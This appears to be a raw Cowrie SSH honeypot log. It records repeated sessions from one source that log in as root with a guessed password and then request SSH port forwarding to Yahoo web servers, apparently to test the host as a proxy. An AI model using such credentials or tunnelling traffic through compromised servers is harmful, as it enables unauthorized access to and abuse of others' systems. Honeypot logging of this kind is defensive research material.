"ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.444145Z","src_ip":"213.209.150.239","session":"98ba1f3efd01"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.679768Z","src_ip":"213.209.150.239","session":"98ba1f3efd01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26308,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26308","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.727844Z","session":"98ba1f3efd01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.775269Z","src_ip":"213.209.150.239","session":"98ba1f3efd01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":8851,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8851","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.909451Z","session":"98ba1f3efd01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:36.956592Z","src_ip":"213.209.150.239","session":"98ba1f3efd01"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.004849Z","src_ip":"213.209.150.239","session":"98ba1f3efd01"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9294,"dst_ip":"1.2.3.4","dst_port":22,"session":"219d7a44c83d","protocol":"ssh","message":"New connection: 213.209.150.239:9294 (1.2.3.4:22) [session: 219d7a44c83d]","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.051120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.051910Z","src_ip":"213.209.150.239","session":"219d7a44c83d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.099380Z","src_ip":"213.209.150.239","session":"219d7a44c83d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.334641Z","src_ip":"213.209.150.239","session":"219d7a44c83d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":22580,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22580","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.383007Z","session":"219d7a44c83d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.430450Z","src_ip":"213.209.150.239","session":"219d7a44c83d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":28037,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28037","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.565586Z","session":"219d7a44c83d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.613105Z","src_ip":"213.209.150.239","session":"219d7a44c83d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.661299Z","src_ip":"213.209.150.239","session":"219d7a44c83d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9328,"dst_ip":"1.2.3.4","dst_port":22,"session":"c014a6d7f8b4","protocol":"ssh","message":"New connection: 213.209.150.239:9328 (1.2.3.4:22) [session: c014a6d7f8b4]","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.707451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.708567Z","src_ip":"213.209.150.239","session":"c014a6d7f8b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.755935Z","src_ip":"213.209.150.239","session":"c014a6d7f8b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:37.996106Z","src_ip":"213.209.150.239","session":"c014a6d7f8b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5578,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5578","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.044742Z","session":"c014a6d7f8b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.092313Z","src_ip":"213.209.150.239","session":"c014a6d7f8b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20597,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20597","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.229524Z","session":"c014a6d7f8b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.277429Z","src_ip":"213.209.150.239","session":"c014a6d7f8b4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.325636Z","src_ip":"213.209.150.239","session":"c014a6d7f8b4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9385,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1f0377c7419","protocol":"ssh","message":"New connection: 213.209.150.239:9385 (1.2.3.4:22) [session: f1f0377c7419]","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.371914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.372790Z","src_ip":"213.209.150.239","session":"f1f0377c7419"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.420497Z","src_ip":"213.209.150.239","session":"f1f0377c7419"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.658280Z","src_ip":"213.209.150.239","session":"f1f0377c7419"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31555,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31555","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.706916Z","session":"f1f0377c7419"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.755080Z","src_ip":"213.209.150.239","session":"f1f0377c7419"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31282,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31282","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.889534Z","session":"f1f0377c7419"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.936886Z","src_ip":"213.209.150.239","session":"f1f0377c7419"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:38.984908Z","src_ip":"213.209.150.239","session":"f1f0377c7419"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9433,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d3aa060a419","protocol":"ssh","message":"New connection: 213.209.150.239:9433 (1.2.3.4:22) [session: 7d3aa060a419]","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.041129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.042073Z","src_ip":"213.209.150.239","session":"7d3aa060a419"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.098745Z","src_ip":"213.209.150.239","session":"7d3aa060a419"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.382224Z","src_ip":"213.209.150.239","session":"7d3aa060a419"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":19471,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19471","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.440783Z","session":"7d3aa060a419"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.497587Z","src_ip":"213.209.150.239","session":"7d3aa060a419"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22718,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22718","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.651136Z","session":"7d3aa060a419"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.707840Z","src_ip":"213.209.150.239","session":"7d3aa060a419"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.765541Z","src_ip":"213.209.150.239","session":"7d3aa060a419"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9474,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a4a54858109","protocol":"ssh","message":"New connection: 213.209.150.239:9474 (1.2.3.4:22) [session: 0a4a54858109]","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.821114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.821924Z","src_ip":"213.209.150.239","session":"0a4a54858109"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:39.879294Z","src_ip":"213.209.150.239","session":"0a4a54858109"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.162099Z","src_ip":"213.209.150.239","session":"0a4a54858109"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":28256,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28256","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.219858Z","session":"0a4a54858109"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.276580Z","src_ip":"213.209.150.239","session":"0a4a54858109"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":19714,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19714","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.431013Z","session":"0a4a54858109"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:40.487664Z","src_ip":"213.209.150.239","session":"0a4a54858109"}
